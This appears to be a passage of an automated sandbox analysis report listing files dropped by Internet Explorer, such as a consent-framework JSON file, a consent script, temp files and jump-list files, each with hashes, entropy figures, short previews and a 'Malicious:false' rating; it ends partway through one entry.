                                                                                                                                                                                                                                  Preview: ......JFIF.............@ICC_PROFILE......0appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt.......#wtpt........rXYZ........gXYZ........bXYZ...,....rTRC...@....aarg...L... vcgt...l...0ndin.......>chad.......,mmod.......(bTRC...@....gTRC...@....aabg...L... aagg...L... desc........Display.................................................................................mluc......."....hrHR........koKR........nbNO........id..........huHU........csCZ........daDK........ukUA.......2ar.........NitIT.......broRO.......vnlNL........heIL........esES.......vfiFI........zhTW........viVN........skSK........zhCN........ruRU...$....frFR........ms..........caES.......@thTH.......XesXL.......vdeDE.......denUS.......tptBR........plPL........elGR..."....svSE........trTR........jaJP........ptPT.........L.C.D. .u. .b.o.j.i.... .L.C.D.F.a.r.g.e.-.L.C.D.L.C.D. .W.a.r.n.a.S.z...n.e.s. .L.C.D.B.a.r.e.v.n..
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\iab2Data[1].json
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):242382
                                                                                                                                                                                                                                  Entropy (8bit):5.1486574437549235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:l3JqIW6A3pZcOkv+prD5bxLkjO68KQHamIT4Ff5+wbUk6syZ7TMwz:l3JqINA3kR4D5bxLk78KsIkfZ6hBz
                                                                                                                                                                                                                                  MD5:D76FFE379391B1C7EE0773A842843B7E
                                                                                                                                                                                                                                  SHA1:772ED93B31A368AE8548D22E72DDE24BB6E3855C
                                                                                                                                                                                                                                  SHA-256:D0EB78606C49FCD41E2032EC6CC6A985041587AAEE3AE15B6D3B693A924F08F2
                                                                                                                                                                                                                                  SHA-512:23E7888E069D05812710BF56CC76805A4E836B88F7493EC6F669F72A55D5D85AD86AD608650E708FA1861BC78A139616322D34962FD6BE0D64E0BEA0107BF4F4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\otTCF-ie[2].js
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):102879
                                                                                                                                                                                                                                  Entropy (8bit):5.311489377663803
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
                                                                                                                                                                                                                                  MD5:52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
                                                                                                                                                                                                                                  SHA1:D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
                                                                                                                                                                                                                                  SHA-256:E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
                                                                                                                                                                                                                                  SHA-512:DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: !function(){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function t(e,t){return e(t={exports:{}},t.exports),t.exports}function n(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return w.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return I(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(e,t){retur
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF00EAE8B2B5B8F5FB.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39801
                                                                                                                                                                                                                                  Entropy (8bit):0.604028759226281
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kBqoxKAuvScS+2x2v2iY2ip2iy2igIilfVecZIilfVec5IilfVec+:kBqoxKAuqR+w2st2MnfA2nfAynfAj
                                                                                                                                                                                                                                  MD5:05B752A80C1C49B3521BA75381A7D168
                                                                                                                                                                                                                                  SHA1:873A1B8290FC661274A72A4C16FFE00712305BFC
                                                                                                                                                                                                                                  SHA-256:EA095D8EFA9F8E5607F8A2BFAA0CB9F2D33B068B93B88D6422E23A7AFE17DC02
                                                                                                                                                                                                                                  SHA-512:BD62FDD83A827E717621804CA6E39F034D5F0AB14EE8AAC3FAF207A4808A9659C0C45C0880E22CDF4E952BDEED8B6A76BC835F6E9A43058D518506E2E9F77A1B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF26292EA121106FE0.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39785
                                                                                                                                                                                                                                  Entropy (8bit):0.6019433878968067
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kBqoxKAuvScS+Ks2/smS/pveS/pviS/pvz:kBqoxKAuqR+Ks2/smyeyiyz
                                                                                                                                                                                                                                  MD5:BC8AB82B0F9159139E7C8B54749F524A
                                                                                                                                                                                                                                  SHA1:2C8AF0D999489EEAAA58FC2B2381903A24B7233B
                                                                                                                                                                                                                                  SHA-256:EA8BC81235C78202DCC4E2B992575052B4837531E88D4472DC49F86BD8D2D54D
                                                                                                                                                                                                                                  SHA-512:126E3FB286883E375E8EC3BFD1FB73D7D9E1C58B605B0711B74DC9991323F1B1B8BC7611C8E7F6C99B86B9985EDAC095DDA3642512DEB5A6E52B7FB70B59DB9C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF2D124D2D484F93AA.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29989
                                                                                                                                                                                                                                  Entropy (8bit):0.3299472737179171
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwB9lwh9l2n/9l2/9laO:kBqoxKAuvScS+yUn+S7y
                                                                                                                                                                                                                                  MD5:B6336E6B2A6A63FC9F58BF9FE65E0297
                                                                                                                                                                                                                                  SHA1:8952B5293F5E30E3526CF2B61E9FC6AD353E3626
                                                                                                                                                                                                                                  SHA-256:D163187BF1430BDE7193224E3EE8CE55F1DFDB3706727EE149F7F7D852EB238D
                                                                                                                                                                                                                                  SHA-512:1B43EBDDB124AE2D715E7DC26DA113D0FE93B1F2159C31497EC429660DBE353D41D3055F01EA09C542BBD5BBF4CC4A2AF2E3C4481E99B24CA307A7DEF86CF554
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF2FE2530AB7240C94.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29989
                                                                                                                                                                                                                                  Entropy (8bit):0.32935642918200575
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lw1ab9lw1ab9l21a1/9I:kBqoxKAuvScS+17111++1L16y
                                                                                                                                                                                                                                  MD5:C54CD62F1F7D2CB20F7E840ABEBD0F44
                                                                                                                                                                                                                                  SHA1:BCC93094C77C693DC54B98F3A4E07300056AC8D9
                                                                                                                                                                                                                                  SHA-256:0C67486C86B798AE1E33A2D270EFAF2668F652E0A061802DBB775940B3CD6B1C
                                                                                                                                                                                                                                  SHA-512:6339857E6D8146B37ABEE4E7DDC360FEC0A43D4227D597B36BFB53A313DA00D983D55656D1724DFBE4B0D186338A22C1D821D7B59EC5FDC9EA22E344A3620E8B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF3661C54E7E77D8AD.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39801
                                                                                                                                                                                                                                  Entropy (8bit):0.6061195842441318
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:kBqoxKAuvScS+qMjqjDj/Ij/yR/b/DWF+UgfM0wR/b/DWF+UgfM0kR/b/DWF+Ugl:kBqoxKAuvScS+qMWfMem/mfmk
                                                                                                                                                                                                                                  MD5:BBA6A3EEE22B1B609AC7652C16C171B7
                                                                                                                                                                                                                                  SHA1:B81878567D940900DF806913EA6AC25FD660EBA7
                                                                                                                                                                                                                                  SHA-256:EB585EB561796924C271F2FF79EFE4B8AFFF74EA1FEE241C1086B327C7A8A1A7
                                                                                                                                                                                                                                  SHA-512:42143E93711B887C0AF5E82F3EE216517DD5F428C689655DB6CEB80F7F037A672B76021ACF2A737CDF109E3851C0E4F8DD42A7937CE2D909A4581E3AD9EA234D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF5C808EB87D860647.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39673
                                                                                                                                                                                                                                  Entropy (8bit):0.5774462830438569
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kBqoxKAuvScS+RxRvRdRcR/RBnC3ALnC3ADnC3AI:kBqoxKAuqR+rl3el7CwLCwDCwI
                                                                                                                                                                                                                                  MD5:E54E62E22468A1F6FDF4F428BCE2BFF2
                                                                                                                                                                                                                                  SHA1:C259FF4ACEA729EC3C169D0002E15020561DB4D2
                                                                                                                                                                                                                                  SHA-256:75CAC01E3EF8842B75C4AAE06CA15E37A0D96799F47F287D7B11B01DAAA7E989
                                                                                                                                                                                                                                  SHA-512:CE10A769CA2BBEA518E513C3DDBBB47F80DA98E3A0AE0FDD1628B847D4186FEB47200FACCC6F5EA97A93E1FC9B9C55445BFD491BDC82448D2D6BA252A2E72FB5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF84343634E9276D7C.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29745
                                                                                                                                                                                                                                  Entropy (8bit):0.30046700812985444
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laApJ/I9laAC/:kBqoxxJhHWSVSEabpKQ2y
                                                                                                                                                                                                                                  MD5:6F2A4C452006C95244D870528A23573C
                                                                                                                                                                                                                                  SHA1:8CBC4F13BA10C7B8E4440C60D007E8D64BA7F645
                                                                                                                                                                                                                                  SHA-256:43DED421AF29C3BCB2C7587650B4A3D0CCDED1D235A19A9F8E0A9BA5B097056F
                                                                                                                                                                                                                                  SHA-512:492946B8DCCD5E38B91A3FF820B3D6651B633B90B4CA289B4F36E86B0022B07D19C0B1546946521E40176080E1D96936460CE028855AEC0B29197EBE2329424A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF8A471FFBEDEC3971.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18997
                                                                                                                                                                                                                                  Entropy (8bit):2.518949793837217
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kBqoI1jqQ8h808K8d8wL3/4iM3kh7Q3f6usfm:kBqoI1jN8h808K8d81H
                                                                                                                                                                                                                                  MD5:8E318F2F38244D5452A93A638A119AEA
                                                                                                                                                                                                                                  SHA1:D97A0A79DEF6440047E4C4590CCECE69511EB7D3
                                                                                                                                                                                                                                  SHA-256:7C72537A6A63CA435656F7BCE496504AA70ACC6FA937BBCD3D088185E8A81854
                                                                                                                                                                                                                                  SHA-512:7A748F1AD2F3F463A671750AB7B6D314DCDCB464987D05100D3DA175A387B21315169AFE1D579727D426716C232BAF479E30BDBFC8E5F68B059BBBD303C325BB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF8EB834D22FF64704.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):196750
                                                                                                                                                                                                                                  Entropy (8bit):3.1383156107022354
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:MZ/2Bfcdmu5kgTzGtYZ/2Bfc+mu5kgTzGt:l/
                                                                                                                                                                                                                                  MD5:31681437437D80CD11C8E9B060EFC962
                                                                                                                                                                                                                                  SHA1:75F6E496E538AE38AE4A70186D1B44BF92197F98
                                                                                                                                                                                                                                  SHA-256:5026FBFCDCAEE6AF1F8B8D7F2BD1696F5A0B78463B435E35D33B43A28652C104
                                                                                                                                                                                                                                  SHA-512:08D65B06F6C37F59B5103BFBC6395A0DD3FF6B9624ED82A10B8804E629E080E96474327E06DB205FE6778738DCE91BBA1ED613E721FA701489E7F0F144A557D1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFA2F8C93FE1931D2B.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39769
                                                                                                                                                                                                                                  Entropy (8bit):0.5950680179836583
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:kBqoxKAuvScS+2OJqD/I/itie5n3XsGAtie5n3XsGktie5n3XsG9:kBqoxKAuvScS+2OJqDw6bHszbHsrbHsQ
                                                                                                                                                                                                                                  MD5:87DAE5995463933B8419C77733F28477
                                                                                                                                                                                                                                  SHA1:AC65A48FE007D5BAF4112BE5B52D8AB5DF1DE096
                                                                                                                                                                                                                                  SHA-256:21E848AF5B6D023E95E07A1F297351DF0DEDF5C26294A4CEAA6C5B0B15B87D40
                                                                                                                                                                                                                                  SHA-512:56C3F7EED093875A76B74322B5BFC182EFBD620723FBB52D0D0212CFEACB13EF3B3545ECA3B48101DA0197F4791EC945ECEF228B4FEF0C5E6FF39FBD2F19ED36
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFB33ED84EC8412F12.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29989
                                                                                                                                                                                                                                  Entropy (8bit):0.3294803498830615
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwM9lw89l2C/9l2K9la1:kBqoxKAuvScS+PxC+/ey
                                                                                                                                                                                                                                  MD5:FCAC343291F0E23260F5DA078659540A
                                                                                                                                                                                                                                  SHA1:5043B7FFF9C3FD00B20520197141712B336C2C57
                                                                                                                                                                                                                                  SHA-256:015170AD66D8282E51F1DC5620562369E2E0949877E4879B545DB59DFACC6598
                                                                                                                                                                                                                                  SHA-512:A9B79C2FC1C50886A87C36D88418678C97A1B9BCD3541E93C5C3B2CBFA0E7DEF552993BAAC1AD724E9D16B99E6DC82AD9D5D28650625A1040D51A98237866A5E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFC4EEEB78319EB01D.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39801
                                                                                                                                                                                                                                  Entropy (8bit):0.6041886449496772
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kBqoxKAuvScS+j9PGNzfk0lLfk0lDfk0lI:kBqoxKAuqR+j9PGNzVLVDVI
                                                                                                                                                                                                                                  MD5:A235E5C0AB9701434EE49B2B83376C00
                                                                                                                                                                                                                                  SHA1:FD684978E9CED81B2B2DC60F4F07179B820DDF05
                                                                                                                                                                                                                                  SHA-256:941CFB419A7D097EF0097C27D0CEDCA17101A1587B46252A0820CA107A6A0E04
                                                                                                                                                                                                                                  SHA-512:51BCA93E4F87B0B8AD6F3BBCD0A5660FF7297F5C85C9EE5FD9B0329A0484233E1F75B077B565D9FB25CEE1F77435FDF1BF78CE73BB9797C2B982F481521F6671
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFCAB5BA8B11C90CF1.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39785
                                                                                                                                                                                                                                  Entropy (8bit):0.6002690612747263
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:kBqoxKAuqR+RP98fpi+tYq2i+tYq6i+tYqr:kBqoxKAuqR+RP98fpVth2Vth6Vthr
                                                                                                                                                                                                                                  MD5:E1DD307F685BFC8F29CBEE1F082AD911
                                                                                                                                                                                                                                  SHA1:64AAC4064353946CCAFEE67CB6C380535E227FD3
                                                                                                                                                                                                                                  SHA-256:8C69FF1E124382019AD6FA9A980CC005440945CD57C6E6125C383D55C3E57384
                                                                                                                                                                                                                                  SHA-512:AA3AD24B459868379100A8C85C9303327EADCB3D253388CBF9E017004A91052D30055BF5E02F7323B3726620EF930955246A1F47AE4917CCDCC07893CD66CA69
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms. (copy)
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5149
                                                                                                                                                                                                                                  Entropy (8bit):3.175529227779345
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:q+dinP+IqC9GrIof1AsASFd+dinP+Iqh683GrIof1Acz++dinP+Iqx9GrIof1AVt:+P+s9S/1AJAP+N3S/1ApP+b9S/1Af
                                                                                                                                                                                                                                  MD5:237880D3E2A725AB718078878604A903
                                                                                                                                                                                                                                  SHA1:F3C59A147169B76319C0DF2721AE4217632BBA2D
                                                                                                                                                                                                                                  SHA-256:3F35CAE4DFE865844B0252295FBAF19E05CAE5CA462DE4640F62DAD1E921DC71
                                                                                                                                                                                                                                  SHA-512:4C9FE56815CD9594B87CBC3749EAF40357E789C0051B6117D21878C0B5E66BA0625C3629B0E98DA4D910250885CFEF60797893CA15D4BB2FD12EFC402FF77AF6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ...................................FL..................F.@.. .....@.>...p.,Io.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.y..PROGRA~1..t......L.*Si.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.*Sr...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J*Sq......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......].............N......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-mshS (copy)
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5149
                                                                                                                                                                                                                                  Entropy (8bit):3.175529227779345
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:q+dinP+IqC9GrIof1AsASFd+dinP+Iqh683GrIof1Acz++dinP+Iqx9GrIof1AVt:+P+s9S/1AJAP+N3S/1ApP+b9S/1Af
                                                                                                                                                                                                                                  MD5:237880D3E2A725AB718078878604A903
                                                                                                                                                                                                                                  SHA1:F3C59A147169B76319C0DF2721AE4217632BBA2D
                                                                                                                                                                                                                                  SHA-256:3F35CAE4DFE865844B0252295FBAF19E05CAE5CA462DE4640F62DAD1E921DC71
                                                                                                                                                                                                                                  SHA-512:4C9FE56815CD9594B87CBC3749EAF40357E789C0051B6117D21878C0B5E66BA0625C3629B0E98DA4D910250885CFEF60797893CA15D4BB2FD12EFC402FF77AF6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ...................................FL..................F.@.. .....@.>...p.,Io.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.y..PROGRA~1..t......L.*Si.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.*Sr...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J*Sq......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......].............N......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4O87P10W4HIR4BH2GAF8.temp
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5149
                                                                                                                                                                                                                                  Entropy (8bit):3.175529227779345
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:q+dinP+IqC9GrIof1AsASFd+dinP+Iqh683GrIof1Acz++dinP+Iqx9GrIof1AVt:+P+s9S/1AJAP+N3S/1ApP+b9S/1Af
                                                                                                                                                                                                                                  MD5:237880D3E2A725AB718078878604A903
                                                                                                                                                                                                                                  SHA1:F3C59A147169B76319C0DF2721AE4217632BBA2D
